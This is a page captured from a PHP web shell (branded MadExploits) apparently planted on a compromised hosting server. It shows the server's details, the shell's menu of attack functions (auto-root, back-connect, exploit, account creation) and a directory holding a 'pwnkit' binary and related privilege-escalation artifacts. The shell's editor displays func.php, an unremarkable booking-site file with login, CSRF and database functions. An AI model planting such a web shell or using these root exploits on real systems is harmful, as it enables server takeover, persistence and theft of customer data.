Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.218.220.243
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
iTailor-gold /
pm /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
auth.php
2.73
KB
-rw-r--r--
db.php
448
B
-rw-r--r--
func.php
5.27
KB
-rw-r--r--
process-booking.php
3.31
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Code Editor : func.php
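<?php
// Include the database connection file; connectToDatabase() is expected to come from it.
require_once('db.php');

// Log a database failure on the server and end the request with a generic message.
// mysqli error text can expose table and column names, so it is written to the
// error log and never to the HTTP response.
//   $conn    - connection whose last error is logged
//   $context - short label for the step that failed
// Does not return.
function abortOnDatabaseError($conn, $context)
{
    $detail = ($conn instanceof mysqli) ? mysqli_error($conn) : 'no usable connection';
    error_log($context . ': ' . $detail);
    die('A database error occurred.');
}

// Create a new CSRF token, store it in $_SESSION['csrf_token'] and return it.
// Every call replaces the token stored before it.
// NOTE(review): assumes the caller has already started the session; session_start()
// is not called in the code shown here.
function generateCSRFToken()
{
    $token = bin2hex(random_bytes(32));
    $_SESSION['csrf_token'] = $token;
    return $token;
}

// Return true only when $token equals the token stored in the session.
// The comparison is constant-time (hash_equals).
function validateCSRFToken($token)
{
    // A request parameter can arrive as an array (csrf_token[]=x). hash_equals()
    // accepts strings only, so anything else is rejected before the comparison.
    if (!is_string($token)) {
        return false;
    }
    if (!isset($_SESSION['csrf_token']) || !is_string($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $token);
}

// Check a username/password pair against the "user" table.
// Returns true on success. On failure it prints one generic error heading and
// returns false. A database error ends the request.
function authenticateUser($username, $password)
{
    $conn = connectToDatabase();

    // Fetch the stored password hash for this username.
    $query = "SELECT password FROM user WHERE username = ?";
    $stmt = mysqli_prepare($conn, $query);
    if ($stmt === false) {
        abortOnDatabaseError($conn, 'authenticateUser: prepare failed');
    }

    mysqli_stmt_bind_param($stmt, "s", $username);
    if (!mysqli_stmt_execute($stmt)) {
        abortOnDatabaseError($conn, 'authenticateUser: execute failed');
    }

    mysqli_stmt_bind_result($stmt, $stored_hash);
    $row_found = (mysqli_stmt_fetch($stmt) === true);

    // Release the statement and connection on every path, not only on failure.
    mysqli_stmt_close($stmt);
    mysqli_close($conn);

    $authenticated = false;
    if ($row_found && is_string($stored_hash) && is_string($password)) {
        if (password_verify($password, $stored_hash)) {
            // Row written by createUser() with password_hash().
            $authenticated = true;
        } else {
            // Rows created before the switch to password_hash() hold an unsalted
            // SHA-256 hex digest. They are still accepted so existing accounts
            // keep working.
            // TODO: re-hash such rows with password_hash() after a successful
            // login, then remove this fallback.
            $authenticated = hash_equals($stored_hash, hash('sha256', $password));
        }
    }

    if (!$authenticated) {
        // One message for "unknown user" and "wrong password", so the response
        // does not reveal which usernames exist.
        echo '<h1 style="color:red;">Invalid username or password.</h1>';
    }

    return $authenticated;
}

// Insert a new row into the "user" table.
// Returns true on success. Any failure ends the request.
function createUser($username, $password)
{
    $conn = connectToDatabase();

    // password_hash() adds a per-user salt and a work factor. A bare SHA-256
    // digest is fast to brute-force and gives identical passwords identical hashes.
    // PASSWORD_BCRYPT yields a 60-character string, which fits any column that
    // already held the 64-character SHA-256 hex digest. bcrypt only uses the
    // first 72 bytes of the password.
    // NOTE(review): any other code that compares against this column directly
    // must go through authenticateUser() instead.
    $hashed_password = password_hash($password, PASSWORD_BCRYPT);
    if (!is_string($hashed_password)) {
        error_log('createUser: password_hash failed');
        die('Unable to create user.');
    }

    $query = "INSERT INTO user (username, password) VALUES (?, ?)";
    $stmt = mysqli_prepare($conn, $query);
    if ($stmt === false) {
        abortOnDatabaseError($conn, 'createUser: prepare failed');
    }

    mysqli_stmt_bind_param($stmt, "ss", $username, $hashed_password);
    if (!mysqli_stmt_execute($stmt)) {
        abortOnDatabaseError($conn, 'createUser: execute failed');
    }

    mysqli_stmt_close($stmt);
    mysqli_close($conn);
    return true;
}

// Insert one booking into the "records" table; "added" is set to NOW().
// Returns nothing. A failed insert prints a generic error heading.
// NOTE(review): the values are stored as received; no format or length
// validation happens here, so the caller must validate them.
function saveBookingData($name, $email, $phone, $location, $service, $date)
{
    $conn = connectToDatabase();

    $query = "INSERT INTO records (name, email, phone, location, service, date, added) VALUES (?, ?, ?, ?, ?, ?, NOW())";
    $stmt = mysqli_prepare($conn, $query);
    if ($stmt === false) {
        abortOnDatabaseError($conn, 'saveBookingData: prepare failed');
    }

    mysqli_stmt_bind_param($stmt, "ssssss", $name, $email, $phone, $location, $service, $date);

    if (!mysqli_stmt_execute($stmt)) {
        // The mysqli error detail goes to the log, not to the page.
        error_log('saveBookingData: execute failed: ' . mysqli_error($conn));
        echo '<h1 style="color:green;">Error executing statement.</h1>';
    }

    mysqli_stmt_close($stmt);
    mysqli_close($conn);
}

// Print every row of the "records" table as an HTML <tr>: a running number,
// then name, email and phone. location, service and date are selected but not
// rendered.
// NOTE(review): this prints customer contact data; the calling page is assumed
// to enforce authentication — confirm.
function fetchRecords()
{
    $conn = connectToDatabase();

    $query = "SELECT name, email, phone, location, service, date FROM records";
    $result = mysqli_query($conn, $query);
    if (!$result) {
        abortOnDatabaseError($conn, 'fetchRecords: query failed');
    }

    if (mysqli_num_rows($result) > 0) {
        $i = 1;
        while ($row = mysqli_fetch_assoc($result)) {
            // The values come from the booking form, so they are untrusted and
            // are HTML-escaped before printing to prevent stored XSS.
            $name  = htmlspecialchars((string) $row["name"], ENT_QUOTES, 'UTF-8');
            $email = htmlspecialchars((string) $row["email"], ENT_QUOTES, 'UTF-8');
            $phone = htmlspecialchars((string) $row["phone"], ENT_QUOTES, 'UTF-8');

            echo "<tr>";
            echo "<td class='text-center'>" . $i . "</td>";
            echo "<td>" . $name . "</td>";
            echo "<td>" . $email . "</td>";
            echo "<td>" . $phone . "</td>";
            echo "</tr>";
            $i++;
        }
    } else {
        // No records found
        echo "<tr><td colspan='6'>No records found</td></tr>";
    }

    mysqli_free_result($result);
    mysqli_close($conn);
}
?>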